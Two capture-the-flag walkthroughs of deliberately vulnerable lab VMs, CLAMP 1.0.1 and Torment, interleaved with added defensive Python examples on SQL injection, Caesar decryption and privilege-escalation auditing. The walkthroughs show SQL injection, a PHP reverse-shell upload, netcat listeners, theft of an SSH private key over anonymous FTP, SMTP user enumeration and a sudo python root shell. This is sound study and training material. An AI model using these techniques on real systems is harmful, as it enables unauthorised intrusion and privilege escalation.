CLAMP 1.0.1 Vulnhub Walkthrough


In this article, we are going to take on a new challenge, CLAMP 1.0.1. The credit for making this VM goes to “Mehmet Kelepçe”, and it is another boot2root challenge where we have to root the server and capture the flag to complete it. You can download this VM here.
Security Level: Intermediate
Penetrating Methodology:
    Scanning
        Netdiscover
        Nmap
    Enumeration
        Web Directory Search
        SQL Injection
    Privilege Escalation
        Abusing Sudo Rights

Walkthrough:
Scanning:
Let’s start with the scanning process. The target VM obtained the IP address 192.168.1.101 automatically from our local Wi-Fi network.
netdiscover

We used Nmap for port scanning. Here you can see that ports 22 and 80 are open, and both are important to us.
nmap -A 192.168.1.101

As port 80 is open, we will open the IP in our browser as shown below:


Upon opening the IP in the browser, the page says “you have found this. But you need more patience”, both in English and in Turkish, which means there is more to find. So we ran DirBuster next and got the following results:

From the OWASP DirBuster results, the one directory that looked useful is /nt4stopc/. Opening this directory in the browser shows the following page:


This page asks a series of true/false questions; each answer maps to one bit, false to 0 and true to 1.

Question                                                True/False   Bit
Baku is the capital of Turkey?                          False        0
The beginning of the French revolution is 1798.         True         1
Istanbul was conquered in 1435?                         True         1
Fatih Sultan Mehmet is the founder of Ottoman Empire?   False        0
The founder of the robot science is Al-Cezeri?          True         1
Dennis Ritchie who developed the C language?            True         1
The function definition belongs to the C89 standard?    True         1
The other element of the array is 1?                    False        0
Is the maximum 32-bit value 2,147,482646?               False        0
Is there an undefined behaviour in the following code?  True         1

Answering all the questions in order gives the binary string ‘0110111001’. Now append that binary string to the directory name as shown below:

Once this is done, the page that opens shows the message “I think you need a vacation. Don’t worry, I’m directing”, again in both English and Turkish, and then redirects to a webpage presenting Turkey as a holiday spot, as shown in the image below:

This link is vulnerable to SQL injection. We found this by simply appending a single quote (') after id=1, and our suspicion was confirmed when the page returned a database error.

To exploit the SQL injection we used sqlmap with the following command:

Executing the above command gives the following result, which is how we got the database name, tatil, as shown in the image below:
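Why a stray single quote produces the error that gave the injection away, and the parameterized query that prevents it, as an added example that is not part of the original walkthrough. It uses a constructed in-memory SQLite table as a stand-in for the tatil database; the schema and values are assumptions.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (not the real tatil schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE places (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO places VALUES (?, ?)",
                     [(1, "Antalya"), (2, "Bodrum"), (3, "Fethiye")])
    return conn

def lookup_vulnerable(conn, user_id: str) -> list:
    """String-built query: the request parameter becomes part of the SQL text."""
    sql = "SELECT name FROM places WHERE id = '%s'" % user_id
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_id: str) -> list:
    """Parameterized query: the value is bound by the driver, never parsed as SQL."""
    rows = conn.execute("SELECT name FROM places WHERE id = ?", (user_id,))
    return [row[0] for row in rows]

def probe(user_id: str) -> dict:
    """Feed the same id to both versions and report what each one returns."""
    conn = make_db()
    result = {"safe": lookup_safe(conn, user_id)}
    try:
        result["vulnerable"] = lookup_vulnerable(conn, user_id)
    except sqlite3.Error as exc:
        # The unbalanced quote breaks the statement; this is the error the page saw.
        result["vulnerable"] = "error: " + type(exc).__name__
    return result

if __name__ == "__main__":
    print(probe("1"))    # both return ['Antalya']
    print(probe("1'"))   # vulnerable: error, safe: []
```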

In the database we found a Caesar-encrypted string, which will lead us to where we can upload our malware.

We decrypted the string online; it turned out to use shift 13 of the cipher, as shown in the image below:
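A Caesar cipher has only 26 keys, so the decryption done online above can be reproduced offline; this added example (not from the original walkthrough) implements the shift, the ROT13 special case, and a search over all shifts for a hinted word. The sample ciphertext is constructed, since the page only shows the real string as an image.

```python
import string

def caesar_shift(text: str, shift: int) -> str:
    """Shift every ASCII letter by `shift` places; case and non-letters are preserved."""
    out = []
    for ch in text:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

def rot13(text: str) -> str:
    """ROT13 is the Caesar cipher with shift 13; applying it twice restores the input."""
    return caesar_shift(text, 13)

def all_shifts(ciphertext: str) -> list:
    """Decrypt under every possible key; the whole key space is 26 entries."""
    return [(k, caesar_shift(ciphertext, -k)) for k in range(26)]

def find_shift(ciphertext: str, hint: str) -> list:
    """Return the (shift, plaintext) pairs whose plaintext contains the hinted word."""
    return [(k, pt) for k, pt in all_shifts(ciphertext) if hint in pt.lower()]

if __name__ == "__main__":
    # Constructed sample; the walkthrough's actual string is not reproduced here.
    sample = "hcybnq.cuc"
    print(rot13(sample))               # upload.php
    print(find_shift(sample, "upload"))  # [(13, 'upload.php')]
```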

When we add this decrypted string to the URL, we are redirected to the following page:

Then we opened the upload.php page to upload our malware. It has an option to browse for the file, but there is no submit button, as you can see in the following image:

So first we changed the IP and port in the PHP reverse shell so that we can receive the session. The changes we made can be seen in the following image:


Now browse for the shell and select it.

Once the previous step is completed, a message pops up telling you to try again. Without a submit button it looks like we are stuck, but there is a simple solution. Right-click on the page and select ‘Inspect Element’; in the window that opens, click on the form tag and add the following line:

This change gives you a ‘Submit Query’ button, and it is this button that lets us upload the shell.

Once the file is uploaded, it shows the message ‘The file osas/md5(php-reverse-shell.php.php has been uploaded’. Note that the uploaded file is stored under the MD5 hash of its original name.

So we calculated the MD5 hash of the file name with the following command:
echo -n "php-reverse-shell.php" | md5sum

Then start netcat with the following command:
nc -lvp 1234
Once the uploaded shell is executed, you will have your session. With further enumeration we found important.pcapng.

Now let us download the file to inspect it. To download it, simply add its name to the URL and press Enter.

As the file is in pcapng format, open it in Wireshark. If you follow the TCP stream of the HTTP request packet, you will find the password there, in cleartext.

Now that we have the password, we can log in directly using SSH with the following command:
Once logged in, go to the root directory, where you will find a flag. Reading the flag tells you that the challenges are done.

Hurray! Another CTF solved. This is a great lab with a strong focus on enumeration.

digitalworld.local:Torment Vulnhub Walkthrough


Hello guys, today we are going to take on a new challenge, Torment, which is a lab from the digitalworld series. The credit for making this VM goes to “Donavan”, and it is another boot2root challenge where we have to root the server and capture the flag to complete it. You can download this VM here.
Security Level: Intermediate
Penetrating Methodology:
1. Scanning
   · Netdiscover
   · NMAP
2. Enumeration
   · FTP
   · HexChat
   · LinEnum.sh
3. Exploitation
   · Metasploit
   · Netcat
4. Privilege Escalation
   · Exploiting Sudo rights

Walkthrough:

Scanning:
Let’s start off by scanning the network and identifying the host IP address. We identified the target IP as 192.168.1.105 using Netdiscover.
netdiscover



Then, as usual, we used our favorite tool Nmap for port enumeration and found that many ports are open on the target machine, including 21 and 22.

nmap -A 192.168.1.105



Other important ports open on the system are 25, 80, 445, 631, 2049 and 6667.



Enumeration:
As we can see, port 21 is open with anonymous login enabled. So we logged in and found multiple directories, of which ngircd and .ssh caught our attention.
ngircd is a free, portable and lightweight Internet Relay Chat server for small or private networks, and .ssh is the directory that holds the id_rsa keys for SSH authentication.

ftp 192.168.1.105
ls -la


We looked inside the .ngircd directory, where there was a file named channels, which we downloaded to our Kali system.
Likewise, we downloaded the id_rsa file from the .ssh directory.

cd .ngircd
ls
get channels
cd .ssh
get id_rsa


Looking inside the channels file, we found two channels named games and tormentedprinter.
The id_rsa file contained a private key that could be used for SSH login to the target system.
cat channels
cat id_rsa


As explained above, there is an ngircd chat service running. We tried to connect to the target using HexChat.


We entered the target host IP address, but we don’t have the password to log in.



So we installed ngircd on our Kali system just to look up the default password of the ngircd chat service.




In the /etc/ngircd configuration we looked for the default credentials.


We got a password wealllikedebian.


We used this default password in HexChat to connect to the target machine.


After connecting, it asked us to join a channel; if you remember, we already have the two channel names games and tormentedprinter. We tried both, and the latter held some important information for us.



There we found a password, mostmachineshaveasupersecurekeyandalongpassphrasell, which may be used later.



There is a CUPS 2.2.1 service running on port 631 that can be accessed over HTTP, as shown by the nmap scan.
We tried to open the same port in the browser.



Looking around for some information, in the Printers tab we found some names which we thought could be used to form a username list.


We created a users file in which we copied all the names found above.


Exploitation:
From the nmap scan you may have noticed that there is a Postfix SMTP service running on port 25. We looked for an exploit and found it is vulnerable to user enumeration by brute force.
We passed in the users file created above for brute forcing and found two legitimate users, Patrick and Qiu.
use auxiliary/scanner/smtp/smtp_enum
set rhosts 192.168.1.105
set user_file /root/users
exploit


So we have a username and a private SSH key that we can use to log in to the target system.
We logged in as patrick and checked the sudoers list, but didn’t find any binary that would lead to privilege escalation.
chmod 600 id_rsa
ssh -i id_rsa patrick@192.168.1.105
sudo -l


To enumerate further we used LinEnum.sh, which we downloaded onto the target machine with wget.
Unfortunately, it didn’t find anything useful.
cd /tmp
chmod 777 LinEnum.sh
./LinEnum.sh


Privilege Escalation:
After a lot of enumeration and digging around, we found that apache2.conf, the Apache configuration file, has read, write and execute permissions for all users.
So we tried to edit that file.
ls -la /etc/apache2/apache2.conf
nano /etc/apache2/apache2.conf


We added User qiu and Group qiu inside /etc/apache2/apache2.conf so that we can leverage it for privilege escalation: the idea is that when the Apache service restarts, it will run with the privileges of user qiu.


In parallel we grabbed php-reverse-shell.php from /usr/share/webshells/php, modified the listener IP to ours and saved it as shell.php.
cd /usr/share/webshells/php
ls -la
cp php-reverse-shell.php /root/shell.php
nano shell.php


We edited the listener’s IP to ours.


Then we downloaded the shell into the /var/www/html folder so that we can access it through the browser.
To make Apache run as user qiu we have to restart the service, which we don’t have the privileges to do. However, we can reboot the target system, because patrick is allowed to run the reboot command with sudo.
cd /var/www/html
sudo /bin/systemctl reboot


After the reboot completed, we opened shell.php in the browser while a netcat listener was running on our Kali.


After a short while we got a reverse shell on our Kali system as user qiu.
To elevate to root, we checked the sudoers list and found that python can be run with root privileges without a password. So after executing the python one-liner that spawns a shell with sudo, we got the root shell.
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/sh")'
sudo -l
sudo python -c 'import pty;pty.spawn("/bin/sh")'
id
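Both weaknesses used in this privilege escalation (a world-writable apache2.conf whose User/Group directives decide which account Apache runs as, and a NOPASSWD sudo rule for an interpreter) are easy to audit. This added example (not from the original walkthrough) checks for them; the shell-capable binary list, the sample apache2.conf and the `sudo -l` output are constructed, not captured from the VM.

```python
import os
import re
import stat
import tempfile

# Binaries that hand out an interactive shell when run via sudo (assumed, non-exhaustive).
SHELL_CAPABLE = {"python", "python2", "python3", "perl", "bash", "sh", "vi", "vim", "less"}

def world_writable(path: str) -> bool:
    """True when the 'other' write bit is set, the apache2.conf weakness in this lab."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def apache_run_as(path: str) -> dict:
    """Report the User/Group directives, the values a tampered apache2.conf changes."""
    found = {}
    with open(path) as fh:
        for line in fh:
            m = re.match(r"\s*(User|Group)\s+(\S+)", line)
            if m:
                found[m.group(1)] = m.group(2)
    return found

def risky_sudo_rules(sudo_l_output: str) -> list:
    """Pick NOPASSWD rules from `sudo -l` output that grant a shell-capable binary or ALL."""
    risky = []
    for line in sudo_l_output.splitlines():
        if "NOPASSWD:" not in line:
            continue  # rules that still prompt for a password are not flagged here
        for cmd in line.split("NOPASSWD:", 1)[1].split(","):
            cmd = cmd.strip()
            binary = os.path.basename(cmd.split()[0]) if cmd else ""
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                risky.append(cmd)
    return risky

# Constructed `sudo -l` output modelled on the lab's qiu user; not captured from the VM.
SAMPLE_SUDO_L = """\
User qiu may run the following commands on torment:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /bin/systemctl reboot
"""

def demo() -> dict:
    """Write a constructed, deliberately world-writable apache2.conf and audit it."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as fh:
        fh.write("User ${APACHE_RUN_USER}\nGroup qiu\n")
        path = fh.name
    os.chmod(path, 0o666)  # the permission mistake the walkthrough found
    report = {"writable": world_writable(path), "run_as": apache_run_as(path),
              "sudo": risky_sudo_rules(SAMPLE_SUDO_L)}
    os.unlink(path)
    return report
```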



Once you have the root shell, getting the root flag is a cakewalk, which we eventually did, obtaining the two flags proof.txt and author-secret.txt.
ls
cat proof.txt
cat author-secret.txt